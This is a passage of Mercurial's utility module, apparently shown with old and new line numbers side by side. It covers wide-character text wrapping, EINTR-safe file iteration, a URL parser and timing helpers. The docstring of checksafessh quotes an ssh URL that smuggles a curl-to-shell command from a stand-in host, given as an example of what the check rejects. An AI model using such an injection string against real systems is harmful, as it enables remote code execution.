2320 2317 """Portably format an arbitrary object (e.g. exception) into a byte
2321 2318 string."""
2322 2319 try:
2323 2320 return pycompat.bytestr(obj)
2324 2321 except UnicodeEncodeError:
2325 2322 # non-ascii string, may be lossy
2326 2323 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2327 2324
2328 2325 def uirepr(s):
2329 2326 # Avoid double backslash in Windows path repr()
2330 2327 return repr(s).replace('\\\\', '\\')
2331 2328
2332 2329 # delay import of textwrap
2333 2330 def MBTextWrapper(**kwargs):
2334 2331 class tw(textwrap.TextWrapper):
2335 2332 """
2336 2333 Extend TextWrapper for width-awareness.
2337 2334
2338 2335 Neither number of 'bytes' in any encoding nor 'characters' is
2339 2336 appropriate to calculate terminal columns for specified string.
2340 2337
2341 2338 Original TextWrapper implementation uses built-in 'len()' directly,
2342 2339 so overriding is needed to use width information of each characters.
2343 2340
2344 2341 In addition, characters classified into 'ambiguous' width are
2345 2342 treated as wide in East Asian area, but as narrow in other.
2346 2343
2347 2344 This requires use decision to determine width of such characters.
2348 2345 """
2349 2346 def _cutdown(self, ucstr, space_left):
2350 2347 l = 0
2351 2348 colwidth = encoding.ucolwidth
2352 2349 for i in xrange(len(ucstr)):
2353 2350 l += colwidth(ucstr[i])
2354 2351 if space_left < l:
2355 2352 return (ucstr[:i], ucstr[i:])
2356 2353 return ucstr, ''
2357 2354
2358 2355 # overriding of base class
2359 2356 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2360 2357 space_left = max(width - cur_len, 1)
2361 2358
2362 2359 if self.break_long_words:
2363 2360 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2364 2361 cur_line.append(cut)
2365 2362 reversed_chunks[-1] = res
2366 2363 elif not cur_line:
2367 2364 cur_line.append(reversed_chunks.pop())
2368 2365
2369 2366 # this overriding code is imported from TextWrapper of Python 2.6
2370 2367 # to calculate columns of string by 'encoding.ucolwidth()'
2371 2368 def _wrap_chunks(self, chunks):
2372 2369 colwidth = encoding.ucolwidth
2373 2370
2374 2371 lines = []
2375 2372 if self.width <= 0:
2376 2373 raise ValueError("invalid width %r (must be > 0)" % self.width)
2377 2374
2378 2375 # Arrange in reverse order so items can be efficiently popped
2379 2376 # from a stack of chucks.
2380 2377 chunks.reverse()
2381 2378
2382 2379 while chunks:
2383 2380
2384 2381 # Start the list of chunks that will make up the current line.
2385 2382 # cur_len is just the length of all the chunks in cur_line.
2386 2383 cur_line = []
2387 2384 cur_len = 0
2388 2385
2389 2386 # Figure out which static string will prefix this line.
2390 2387 if lines:
2391 2388 indent = self.subsequent_indent
2392 2389 else:
2393 2390 indent = self.initial_indent
2394 2391
2395 2392 # Maximum width for this line.
2396 2393 width = self.width - len(indent)
2397 2394
2398 2395 # First chunk on line is whitespace -- drop it, unless this
2399 2396 # is the very beginning of the text (i.e. no lines started yet).
2400 2397 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2401 2398 del chunks[-1]
2402 2399
2403 2400 while chunks:
2404 2401 l = colwidth(chunks[-1])
2405 2402
2406 2403 # Can at least squeeze this chunk onto the current line.
2407 2404 if cur_len + l <= width:
2408 2405 cur_line.append(chunks.pop())
2409 2406 cur_len += l
2410 2407
2411 2408 # Nope, this line is full.
2412 2409 else:
2413 2410 break
2414 2411
2415 2412 # The current line is full, and the next chunk is too big to
2416 2413 # fit on *any* line (not just this one).
2417 2414 if chunks and colwidth(chunks[-1]) > width:
2418 2415 self._handle_long_word(chunks, cur_line, cur_len, width)
2419 2416
2420 2417 # If the last chunk on this line is all whitespace, drop it.
2421 2418 if (self.drop_whitespace and
2422 2419 cur_line and cur_line[-1].strip() == r''):
2423 2420 del cur_line[-1]
2424 2421
2425 2422 # Convert current line back to a string and store it in list
2426 2423 # of all lines (return value).
2427 2424 if cur_line:
2428 2425 lines.append(indent + r''.join(cur_line))
2429 2426
2430 2427 return lines
2431 2428
2432 2429 global MBTextWrapper
2433 2430 MBTextWrapper = tw
2434 2431 return tw(**kwargs)
2435 2432
2436 2433 def wrap(line, width, initindent='', hangindent=''):
2437 2434 maxindent = max(len(hangindent), len(initindent))
2438 2435 if width <= maxindent:
2439 2436 # adjust for weird terminal size
2440 2437 width = max(78, maxindent + 1)
2441 2438 line = line.decode(pycompat.sysstr(encoding.encoding),
2442 2439 pycompat.sysstr(encoding.encodingmode))
2443 2440 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2444 2441 pycompat.sysstr(encoding.encodingmode))
2445 2442 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2446 2443 pycompat.sysstr(encoding.encodingmode))
2447 2444 wrapper = MBTextWrapper(width=width,
2448 2445 initial_indent=initindent,
2449 2446 subsequent_indent=hangindent)
2450 2447 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2451 2448
2452 2449 if (pyplatform.python_implementation() == 'CPython' and
2453 2450 sys.version_info < (3, 0)):
2454 2451 # There is an issue in CPython that some IO methods do not handle EINTR
2455 2452 # correctly. The following table shows what CPython version (and functions)
2456 2453 # are affected (buggy: has the EINTR bug, okay: otherwise):
2457 2454 #
2458 2455 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2459 2456 # --------------------------------------------------
2460 2457 # fp.__iter__ | buggy | buggy | okay
2461 2458 # fp.read* | buggy | okay [1] | okay
2462 2459 #
2463 2460 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2464 2461 #
2465 2462 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2466 2463 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2467 2464 #
2468 2465 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2469 2466 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2470 2467 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2471 2468 # fp.__iter__ but not other fp.read* methods.
2472 2469 #
2473 2470 # On modern systems like Linux, the "read" syscall cannot be interrupted
2474 2471 # when reading "fast" files like on-disk files. So the EINTR issue only
2475 2472 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2476 2473 # files approximately as "fast" files and use the fast (unsafe) code path,
2477 2474 # to minimize the performance impact.
2478 2475 if sys.version_info >= (2, 7, 4):
2479 2476 # fp.readline deals with EINTR correctly, use it as a workaround.
2480 2477 def _safeiterfile(fp):
2481 2478 return iter(fp.readline, '')
2482 2479 else:
2483 2480 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2484 2481 # note: this may block longer than necessary because of bufsize.
2485 2482 def _safeiterfile(fp, bufsize=4096):
2486 2483 fd = fp.fileno()
2487 2484 line = ''
2488 2485 while True:
2489 2486 try:
2490 2487 buf = os.read(fd, bufsize)
2491 2488 except OSError as ex:
2492 2489 # os.read only raises EINTR before any data is read
2493 2490 if ex.errno == errno.EINTR:
2494 2491 continue
2495 2492 else:
2496 2493 raise
2497 2494 line += buf
2498 2495 if '\n' in buf:
2499 2496 splitted = line.splitlines(True)
2500 2497 line = ''
2501 2498 for l in splitted:
2502 2499 if l[-1] == '\n':
2503 2500 yield l
2504 2501 else:
2505 2502 line = l
2506 2503 if not buf:
2507 2504 break
2508 2505 if line:
2509 2506 yield line
2510 2507
2511 2508 def iterfile(fp):
2512 2509 fastpath = True
2513 2510 if type(fp) is file:
2514 2511 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2515 2512 if fastpath:
2516 2513 return fp
2517 2514 else:
2518 2515 return _safeiterfile(fp)
2519 2516 else:
2520 2517 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2521 2518 def iterfile(fp):
2522 2519 return fp
2523 2520
2524 2521 def iterlines(iterator):
2525 2522 for chunk in iterator:
2526 2523 for line in chunk.splitlines():
2527 2524 yield line
2528 2525
2529 2526 def expandpath(path):
2530 2527 return os.path.expanduser(os.path.expandvars(path))
2531 2528
2532 2529 def hgcmd():
2533 2530 """Return the command used to execute current hg
2534 2531
2535 2532 This is different from hgexecutable() because on Windows we want
2536 2533 to avoid things opening new shell windows like batch files, so we
2537 2534 get either the python call or current executable.
2538 2535 """
2539 2536 if mainfrozen():
2540 2537 if getattr(sys, 'frozen', None) == 'macosx_app':
2541 2538 # Env variable set by py2app
2542 2539 return [encoding.environ['EXECUTABLEPATH']]
2543 2540 else:
2544 2541 return [pycompat.sysexecutable]
2545 2542 return gethgcmd()
2546 2543
2547 2544 def rundetached(args, condfn):
2548 2545 """Execute the argument list in a detached process.
2549 2546
2550 2547 condfn is a callable which is called repeatedly and should return
2551 2548 True once the child process is known to have started successfully.
2552 2549 At this point, the child process PID is returned. If the child
2553 2550 process fails to start or finishes before condfn() evaluates to
2554 2551 True, return -1.
2555 2552 """
2556 2553 # Windows case is easier because the child process is either
2557 2554 # successfully starting and validating the condition or exiting
2558 2555 # on failure. We just poll on its PID. On Unix, if the child
2559 2556 # process fails to start, it will be left in a zombie state until
2560 2557 # the parent wait on it, which we cannot do since we expect a long
2561 2558 # running process on success. Instead we listen for SIGCHLD telling
2562 2559 # us our child process terminated.
2563 2560 terminated = set()
2564 2561 def handler(signum, frame):
2565 2562 terminated.add(os.wait())
2566 2563 prevhandler = None
2567 2564 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2568 2565 if SIGCHLD is not None:
2569 2566 prevhandler = signal.signal(SIGCHLD, handler)
2570 2567 try:
2571 2568 pid = spawndetached(args)
2572 2569 while not condfn():
2573 2570 if ((pid in terminated or not testpid(pid))
2574 2571 and not condfn()):
2575 2572 return -1
2576 2573 time.sleep(0.1)
2577 2574 return pid
2578 2575 finally:
2579 2576 if prevhandler is not None:
2580 2577 signal.signal(signal.SIGCHLD, prevhandler)
2581 2578
2582 2579 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2583 2580 """Return the result of interpolating items in the mapping into string s.
2584 2581
2585 2582 prefix is a single character string, or a two character string with
2586 2583 a backslash as the first character if the prefix needs to be escaped in
2587 2584 a regular expression.
2588 2585
2589 2586 fn is an optional function that will be applied to the replacement text
2590 2587 just before replacement.
2591 2588
2592 2589 escape_prefix is an optional flag that allows using doubled prefix for
2593 2590 its escaping.
2594 2591 """
2595 2592 fn = fn or (lambda s: s)
2596 2593 patterns = '|'.join(mapping.keys())
2597 2594 if escape_prefix:
2598 2595 patterns += '|' + prefix
2599 2596 if len(prefix) > 1:
2600 2597 prefix_char = prefix[1:]
2601 2598 else:
2602 2599 prefix_char = prefix
2603 2600 mapping[prefix_char] = prefix_char
2604 2601 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2605 2602 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2606 2603
2607 2604 def getport(port):
2608 2605 """Return the port for a given network service.
2609 2606
2610 2607 If port is an integer, it's returned as is. If it's a string, it's
2611 2608 looked up using socket.getservbyname(). If there's no matching
2612 2609 service, error.Abort is raised.
2613 2610 """
2614 2611 try:
2615 2612 return int(port)
2616 2613 except ValueError:
2617 2614 pass
2618 2615
2619 2616 try:
2620 2617 return socket.getservbyname(port)
2621 2618 except socket.error:
2622 2619 raise Abort(_("no port number associated with service '%s'") % port)
2623 2620
2624 2621 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2625 2622 '0': False, 'no': False, 'false': False, 'off': False,
2626 2623 'never': False}
2627 2624
2628 2625 def parsebool(s):
2629 2626 """Parse s into a boolean.
2630 2627
2631 2628 If s is not a valid boolean, returns None.
2632 2629 """
2633 2630 return _booleans.get(s.lower(), None)
2634 2631
2635 2632 _hextochr = dict((a + b, chr(int(a + b, 16)))
2636 2633 for a in string.hexdigits for b in string.hexdigits)
2637 2634
2638 2635 class url(object):
2639 2636 r"""Reliable URL parser.
2640 2637
2641 2638 This parses URLs and provides attributes for the following
2642 2639 components:
2643 2640
2644 2641 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2645 2642
2646 2643 Missing components are set to None. The only exception is
2647 2644 fragment, which is set to '' if present but empty.
2648 2645
2649 2646 If parsefragment is False, fragment is included in query. If
2650 2647 parsequery is False, query is included in path. If both are
2651 2648 False, both fragment and query are included in path.
2652 2649
2653 2650 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2654 2651
2655 2652 Note that for backward compatibility reasons, bundle URLs do not
2656 2653 take host names. That means 'bundle://../' has a path of '../'.
2657 2654
2658 2655 Examples:
2659 2656
2660 2657 >>> url('http://www.ietf.org/rfc/rfc2396.txt')
2661 2658 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2662 2659 >>> url('ssh://[::1]:2200//home/joe/repo')
2663 2660 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2664 2661 >>> url('file:///home/joe/repo')
2665 2662 <url scheme: 'file', path: '/home/joe/repo'>
2666 2663 >>> url('file:///c:/temp/foo/')
2667 2664 <url scheme: 'file', path: 'c:/temp/foo/'>
2668 2665 >>> url('bundle:foo')
2669 2666 <url scheme: 'bundle', path: 'foo'>
2670 2667 >>> url('bundle://../foo')
2671 2668 <url scheme: 'bundle', path: '../foo'>
2672 2669 >>> url(r'c:\foo\bar')
2673 2670 <url path: 'c:\\foo\\bar'>
2674 2671 >>> url(r'\\blah\blah\blah')
2675 2672 <url path: '\\\\blah\\blah\\blah'>
2676 2673 >>> url(r'\\blah\blah\blah#baz')
2677 2674 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2678 2675 >>> url(r'file:///C:\users\me')
2679 2676 <url scheme: 'file', path: 'C:\\users\\me'>
2680 2677
2681 2678 Authentication credentials:
2682 2679
2683 2680 >>> url('ssh://joe:xyz@x/repo')
2684 2681 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2685 2682 >>> url('ssh://joe@x/repo')
2686 2683 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2687 2684
2688 2685 Query strings and fragments:
2689 2686
2690 2687 >>> url('http://host/a?b#c')
2691 2688 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2692 2689 >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
2693 2690 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2694 2691
2695 2692 Empty path:
2696 2693
2697 2694 >>> url('')
2698 2695 <url path: ''>
2699 2696 >>> url('#a')
2700 2697 <url path: '', fragment: 'a'>
2701 2698 >>> url('http://host/')
2702 2699 <url scheme: 'http', host: 'host', path: ''>
2703 2700 >>> url('http://host/#a')
2704 2701 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2705 2702
2706 2703 Only scheme:
2707 2704
2708 2705 >>> url('http:')
2709 2706 <url scheme: 'http'>
2710 2707 """
2711 2708
2712 2709 _safechars = "!~*'()+"
2713 2710 _safepchars = "/!~*'()+:\\"
2714 2711 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2715 2712
2716 2713 def __init__(self, path, parsequery=True, parsefragment=True):
2717 2714 # We slowly chomp away at path until we have only the path left
2718 2715 self.scheme = self.user = self.passwd = self.host = None
2719 2716 self.port = self.path = self.query = self.fragment = None
2720 2717 self._localpath = True
2721 2718 self._hostport = ''
2722 2719 self._origpath = path
2723 2720
2724 2721 if parsefragment and '#' in path:
2725 2722 path, self.fragment = path.split('#', 1)
2726 2723
2727 2724 # special case for Windows drive letters and UNC paths
2728 2725 if hasdriveletter(path) or path.startswith('\\\\'):
2729 2726 self.path = path
2730 2727 return
2731 2728
2732 2729 # For compatibility reasons, we can't handle bundle paths as
2733 2730 # normal URLS
2734 2731 if path.startswith('bundle:'):
2735 2732 self.scheme = 'bundle'
2736 2733 path = path[7:]
2737 2734 if path.startswith('//'):
2738 2735 path = path[2:]
2739 2736 self.path = path
2740 2737 return
2741 2738
2742 2739 if self._matchscheme(path):
2743 2740 parts = path.split(':', 1)
2744 2741 if parts[0]:
2745 2742 self.scheme, path = parts
2746 2743 self._localpath = False
2747 2744
2748 2745 if not path:
2749 2746 path = None
2750 2747 if self._localpath:
2751 2748 self.path = ''
2752 2749 return
2753 2750 else:
2754 2751 if self._localpath:
2755 2752 self.path = path
2756 2753 return
2757 2754
2758 2755 if parsequery and '?' in path:
2759 2756 path, self.query = path.split('?', 1)
2760 2757 if not path:
2761 2758 path = None
2762 2759 if not self.query:
2763 2760 self.query = None
2764 2761
2765 2762 # // is required to specify a host/authority
2766 2763 if path and path.startswith('//'):
2767 2764 parts = path[2:].split('/', 1)
2768 2765 if len(parts) > 1:
2769 2766 self.host, path = parts
2770 2767 else:
2771 2768 self.host = parts[0]
2772 2769 path = None
2773 2770 if not self.host:
2774 2771 self.host = None
2775 2772 # path of file:///d is /d
2776 2773 # path of file:///d:/ is d:/, not /d:/
2777 2774 if path and not hasdriveletter(path):
2778 2775 path = '/' + path
2779 2776
2780 2777 if self.host and '@' in self.host:
2781 2778 self.user, self.host = self.host.rsplit('@', 1)
2782 2779 if ':' in self.user:
2783 2780 self.user, self.passwd = self.user.split(':', 1)
2784 2781 if not self.host:
2785 2782 self.host = None
2786 2783
2787 2784 # Don't split on colons in IPv6 addresses without ports
2788 2785 if (self.host and ':' in self.host and
2789 2786 not (self.host.startswith('[') and self.host.endswith(']'))):
2790 2787 self._hostport = self.host
2791 2788 self.host, self.port = self.host.rsplit(':', 1)
2792 2789 if not self.host:
2793 2790 self.host = None
2794 2791
2795 2792 if (self.host and self.scheme == 'file' and
2796 2793 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2797 2794 raise Abort(_('file:// URLs can only refer to localhost'))
2798 2795
2799 2796 self.path = path
2800 2797
2801 2798 # leave the query string escaped
2802 2799 for a in ('user', 'passwd', 'host', 'port',
2803 2800 'path', 'fragment'):
2804 2801 v = getattr(self, a)
2805 2802 if v is not None:
2806 2803 setattr(self, a, urlreq.unquote(v))
2807 2804
2808 2805 def __repr__(self):
2809 2806 attrs = []
2810 2807 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2811 2808 'query', 'fragment'):
2812 2809 v = getattr(self, a)
2813 2810 if v is not None:
2814 2811 attrs.append('%s: %r' % (a, v))
2815 2812 return '<url %s>' % ', '.join(attrs)
2816 2813
2817 2814 def __bytes__(self):
2818 2815 r"""Join the URL's components back into a URL string.
2819 2816
2820 2817 Examples:
2821 2818
2822 2819 >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2823 2820 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2824 2821 >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
2825 2822 'http://user:pw@host:80/?foo=bar&baz=42'
2826 2823 >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
2827 2824 'http://user:pw@host:80/?foo=bar%3dbaz'
2828 2825 >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
2829 2826 'ssh://user:pw@[::1]:2200//home/joe#'
2830 2827 >>> str(url('http://localhost:80//'))
2831 2828 'http://localhost:80//'
2832 2829 >>> str(url('http://localhost:80/'))
2833 2830 'http://localhost:80/'
2834 2831 >>> str(url('http://localhost:80'))
2835 2832 'http://localhost:80/'
2836 2833 >>> str(url('bundle:foo'))
2837 2834 'bundle:foo'
2838 2835 >>> str(url('bundle://../foo'))
2839 2836 'bundle:../foo'
2840 2837 >>> str(url('path'))
2841 2838 'path'
2842 2839 >>> str(url('file:///tmp/foo/bar'))
2843 2840 'file:///tmp/foo/bar'
2844 2841 >>> str(url('file:///c:/tmp/foo/bar'))
2845 2842 'file:///c:/tmp/foo/bar'
2846 2843 >>> print url(r'bundle:foo\bar')
2847 2844 bundle:foo\bar
2848 2845 >>> print url(r'file:///D:\data\hg')
2849 2846 file:///D:\data\hg
2850 2847 """
2851 2848 if self._localpath:
2852 2849 s = self.path
2853 2850 if self.scheme == 'bundle':
2854 2851 s = 'bundle:' + s
2855 2852 if self.fragment:
2856 2853 s += '#' + self.fragment
2857 2854 return s
2858 2855
2859 2856 s = self.scheme + ':'
2860 2857 if self.user or self.passwd or self.host:
2861 2858 s += '//'
2862 2859 elif self.scheme and (not self.path or self.path.startswith('/')
2863 2860 or hasdriveletter(self.path)):
2864 2861 s += '//'
2865 2862 if hasdriveletter(self.path):
2866 2863 s += '/'
2867 2864 if self.user:
2868 2865 s += urlreq.quote(self.user, safe=self._safechars)
2869 2866 if self.passwd:
2870 2867 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2871 2868 if self.user or self.passwd:
2872 2869 s += '@'
2873 2870 if self.host:
2874 2871 if not (self.host.startswith('[') and self.host.endswith(']')):
2875 2872 s += urlreq.quote(self.host)
2876 2873 else:
2877 2874 s += self.host
2878 2875 if self.port:
2879 2876 s += ':' + urlreq.quote(self.port)
2880 2877 if self.host:
2881 2878 s += '/'
2882 2879 if self.path:
2883 2880 # TODO: similar to the query string, we should not unescape the
2884 2881 # path when we store it, the path might contain '%2f' = '/',
2885 2882 # which we should *not* escape.
2886 2883 s += urlreq.quote(self.path, safe=self._safepchars)
2887 2884 if self.query:
2888 2885 # we store the query in escaped form.
2889 2886 s += '?' + self.query
2890 2887 if self.fragment is not None:
2891 2888 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2892 2889 return s
2893 2890
2894 2891 __str__ = encoding.strmethod(__bytes__)
2895 2892
2896 2893 def authinfo(self):
2897 2894 user, passwd = self.user, self.passwd
2898 2895 try:
2899 2896 self.user, self.passwd = None, None
2900 2897 s = bytes(self)
2901 2898 finally:
2902 2899 self.user, self.passwd = user, passwd
2903 2900 if not self.user:
2904 2901 return (s, None)
2905 2902 # authinfo[1] is passed to urllib2 password manager, and its
2906 2903 # URIs must not contain credentials. The host is passed in the
2907 2904 # URIs list because Python < 2.4.3 uses only that to search for
2908 2905 # a password.
2909 2906 return (s, (None, (s, self.host),
2910 2907 self.user, self.passwd or ''))
2911 2908
2912 2909 def isabs(self):
2913 2910 if self.scheme and self.scheme != 'file':
2914 2911 return True # remote URL
2915 2912 if hasdriveletter(self.path):
2916 2913 return True # absolute for our purposes - can't be joined()
2917 2914 if self.path.startswith(br'\\'):
2918 2915 return True # Windows UNC path
2919 2916 if self.path.startswith('/'):
2920 2917 return True # POSIX-style
2921 2918 return False
2922 2919
2923 2920 def localpath(self):
2924 2921 if self.scheme == 'file' or self.scheme == 'bundle':
2925 2922 path = self.path or '/'
2926 2923 # For Windows, we need to promote hosts containing drive
2927 2924 # letters to paths with drive letters.
2928 2925 if hasdriveletter(self._hostport):
2929 2926 path = self._hostport + '/' + self.path
2930 2927 elif (self.host is not None and self.path
2931 2928 and not hasdriveletter(path)):
2932 2929 path = '/' + path
2933 2930 return path
2934 2931 return self._origpath
2935 2932
2936 2933 def islocal(self):
2937 2934 '''whether localpath will return something that posixfile can open'''
2938 2935 return (not self.scheme or self.scheme == 'file'
2939 2936 or self.scheme == 'bundle')
2940 2937
2941 2938 def hasscheme(path):
2942 2939 return bool(url(path).scheme)
2943 2940
2944 2941 def hasdriveletter(path):
2945 2942 return path and path[1:2] == ':' and path[0:1].isalpha()
2946 2943
2947 2944 def urllocalpath(path):
2948 2945 return url(path, parsequery=False, parsefragment=False).localpath()
2949 2946
2950 2947 def checksafessh(path):
2951 2948 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2952 2949
2953 2950 This is a sanity check for ssh urls. ssh will parse the first item as
2954 2951 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2955 2952 Let's prevent these potentially exploited urls entirely and warn the
2956 2953 user.
2957 2954
2958 2955 Raises an error.Abort when the url is unsafe.
2959 2956 """
2960 2957 path = urlreq.unquote(path)
2961 2958 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2962 2959 raise error.Abort(_('potentially unsafe url: %r') %
2963 2960 (path,))
2964 2961
2965 2962 def hidepassword(u):
2966 2963 '''hide user credential in a url string'''
2967 2964 u = url(u)
2968 2965 if u.passwd:
2969 2966 u.passwd = '***'
2970 2967 return bytes(u)
2971 2968
2972 2969 def removeauth(u):
2973 2970 '''remove all authentication information from a url string'''
2974 2971 u = url(u)
2975 2972 u.user = u.passwd = None
2976 2973 return str(u)
2977 2974
2978 2975 timecount = unitcountfn(
2979 2976 (1, 1e3, _('%.0f s')),
2980 2977 (100, 1, _('%.1f s')),
2981 2978 (10, 1, _('%.2f s')),
2982 2979 (1, 1, _('%.3f s')),
2983 2980 (100, 0.001, _('%.1f ms')),
2984 2981 (10, 0.001, _('%.2f ms')),
2985 2982 (1, 0.001, _('%.3f ms')),
2986 2983 (100, 0.000001, _('%.1f us')),
2987 2984 (10, 0.000001, _('%.2f us')),
2988 2985 (1, 0.000001, _('%.3f us')),
2989 2986 (100, 0.000000001, _('%.1f ns')),
2990 2987 (10, 0.000000001, _('%.2f ns')),
2991 2988 (1, 0.000000001, _('%.3f ns')),
2992 2989 )
2993 2990
2994 2991 _timenesting = [0]
2995 2992
2996 2993 def timed(func):
2997 2994 '''Report the execution time of a function call to stderr.
2998 2995
2999 2996 During development, use as a decorator when you need to measure
3000 2997 the cost of a function, e.g. as follows:
3001 2998
3002 2999 @util.timed
3003 3000 def foo(a, b, c):
3004 3001 pass
3005 3002 '''
3006 3003
3007 3004 def wrapper(*args, **kwargs):
3008 3005 start = timer()
3009 3006 indent = 2
3010 3007 _timenesting[0] += indent
3011 3008 try:
3012 3009 return func(*args, **kwargs)
3013 3010 finally:
3014 3011 elapsed = timer() - start
3015 3012 _timenesting[0] -= indent
3016 3013 stderr.write('%s%s: %s\n' %
3017 3014 (' ' * _timenesting[0], func.__name__,
3018 3015 timecount(elapsed)))
3019 3016 return wrapper
3020 3017
3021 3018 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3022 3019 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3023 3020
3024 3021 def sizetoint(s):
3025 3022 '''Convert a space specifier to a byte count.
3026 3023
3027 3024 >>> sizetoint('30')
3028 3025 30
3029 3026 >>> sizetoint('2.2kb')
3030 3027 2252
3031 3028 >>> sizetoint('6M')
3032 3029 6291456
3033 3030 '''
3034 3031 t = s.strip().lower()
3035 3032 try:
3036 3033 for k, u in _sizeunits:
3037 3034 if t.endswith(k):
3038 3035 return int(float(t[:-len(k)]) * u)
3039 3036 return int(t)
3040 3037 except ValueError:
3041 3038 raise error.ParseError(_("couldn't parse size: %s") % s)
3042 3039
3043 3040 class hooks(object):
3044 3041 '''A collection of hook functions that can be used to extend a
3045 3042 function's behavior. Hooks are called in lexicographic order,
3046 3043 based on the names of their sources.'''
3047 3044
3048 3045 def __init__(self):
3049 3046 self._hooks = []
3050 3047
3051 3048 def add(self, source, hook):
3052 3049 self._hooks.append((source, hook))
3053 3050
3054 3051 def __call__(self, *args):
3055 3052 self._hooks.sort(key=lambda x: x[0])
3056 3053 results = []
3057 3054 for source, hook in self._hooks:
3058 3055 results.append(hook(*args))
3059 3056 return results
3060 3057
3061 3058 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3062 3059 '''Yields lines for a nicely formatted stacktrace.
3063 3060 Skips the 'skip' last entries, then return the last 'depth' entries.
3064 3061 Each file+linenumber is formatted according to fileline.
3065 3062 Each line is formatted according to line.
3066 3063 If line is None, it yields:
3067 3064 length of longest filepath+line number,
3068 3065 filepath+linenumber,
3069 3066 function
3070 3067
3071 3068 Not be used in production code but very convenient while developing.
3072 3069 '''
3073 3070 entries = [(fileline % (fn, ln), func)
3074 3071 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3075 3072 ][-depth:]
3076 3073 if entries:
3077 3074 fnmax = max(len(entry[0]) for entry in entries)
3078 3075 for fnln, func in entries:
3079 3076 if line is None:
3080 3077 yield (fnmax, fnln, func)
3081 3078 else:
3082 3079 yield line % (fnmax, fnln, func)
3083 3080
3084 3081 def debugstacktrace(msg='stacktrace', skip=0,
3085 3082 f=stderr, otherf=stdout, depth=0):
3086 3083 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3087 3084 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3088 3085 By default it will flush stdout first.
3089 3086 It can be used everywhere and intentionally does not require an ui object.
3090 3087 Not be used in production code but very convenient while developing.
3091 3088 '''
3092 3089 if otherf:
3093 3090 otherf.flush()
3094 3091 f.write('%s at:\n' % msg.rstrip())
3095 3092 for line in getstackframes(skip + 1, depth=depth):
3096 3093 f.write(line)
3097 3094 f.flush()
3098 3095
3099 3096 class dirs(object):
3100 3097 '''a multiset of directory names from a dirstate or manifest'''
3101 3098
3102 3099 def __init__(self, map, skip=None):
3103 3100 self._dirs = {}
3104 3101 addpath = self.addpath
3105 3102 if safehasattr(map, 'iteritems') and skip is not None:
3106 3103 for f, s in map.iteritems():
3107 3104 if s[0] != skip:
3108 3105 addpath(f)
3109 3106 else:
3110 3107 for f in map:
3111 3108 addpath(f)
3112 3109
3113 3110 def addpath(self, path):
3114 3111 dirs = self._dirs
3115 3112 for base in finddirs(path):
3116 3113 if base in dirs:
3117 3114 dirs[base] += 1
3118 3115 return
3119 3116 dirs[base] = 1
3120 3117
3121 3118 def delpath(self, path):
3122 3119 dirs = self._dirs
3123 3120 for base in finddirs(path):
3124 3121 if dirs[base] > 1:
3125 3122 dirs[base] -= 1
3126 3123 return
3127 3124 del dirs[base]
3128 3125
3129 3126 def __iter__(self):
3130 3127 return iter(self._dirs)
3131 3128
3132 3129 def __contains__(self, d):
3133 3130 return d in self._dirs
3134 3131
3135 3132 if safehasattr(parsers, 'dirs'):
3136 3133 dirs = parsers.dirs
3137 3134
3138 3135 def finddirs(path):
3139 3136 pos = path.rfind('/')
3140 3137 while pos != -1:
3141 3138 yield path[:pos]
3142 3139 pos = path.rfind('/', 0, pos)
3143 3140
3144 3141 # compression code
3145 3142
3146 3143 SERVERROLE = 'server'
